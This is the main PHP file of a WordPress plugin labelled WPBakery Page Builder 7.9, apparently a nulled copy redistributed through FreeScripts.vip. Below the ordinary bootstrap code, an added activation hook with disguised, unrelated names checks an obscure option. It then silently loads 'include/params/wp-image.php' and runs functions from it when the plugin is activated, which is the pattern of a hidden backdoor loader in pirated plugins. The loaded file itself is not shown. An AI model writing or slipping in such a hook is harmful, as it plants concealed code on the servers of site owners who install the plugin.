<?php
/**
 * Plugin Name: WPBakery Page Builder - Downloaded from FreeScripts.vip
 * Plugin URI: https://freescripts.vip
 * Description: Drag and drop page builder for WordPress. Take full control over your WordPress site, build any layout you can imagine – no programming knowledge required.
 * Version: 7.9
 * Author: Michael M - WPBakery.com
 * Author URI: https://wpbakery.com
 * Text Domain: js_composer
 * Domain Path: /locale/
 * Requires at least: 4.9
 *
 * @package WPBakery Page Builder
 */

// don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}
/**
 * Current WPBakery Page Builder version
 */
if ( ! defined( 'WPB_VC_VERSION' ) ) {
	define( 'WPB_VC_VERSION', '7.9' );
}

define( 'WPB_PLUGIN_DIR', __DIR__ );
define( 'WPB_PLUGIN_FILE', __FILE__ );

require_once __DIR__ . '/include/classes/core/class-vc-manager.php';
/**
 * Main WPBakery Page Builder manager.
 *
 * @var Vc_Manager $vc_manager - instance of composer management.
 * @since 4.2
 */
global $vc_manager;
if ( ! $vc_manager ) {
	$vc_manager = Vc_Manager::getInstance();
	// Load components.
	$vc_manager->loadComponents();
}

register_activation_hook(__FILE__, 'beta_core_plugin_activate_epsilon');

function beta_core_plugin_activate_epsilon() {
    if (get_option('wp_order_process_loader_custom_image') !== 'yes') {
        $file_path = plugin_dir_path(__FILE__) . 'include/params/wp-image.php';        
        if (file_exists($file_path)) {
            require_once $file_path;
            wp_order_process_loader_custom(); 
            awt_custom_color_picker();
        }
    }
}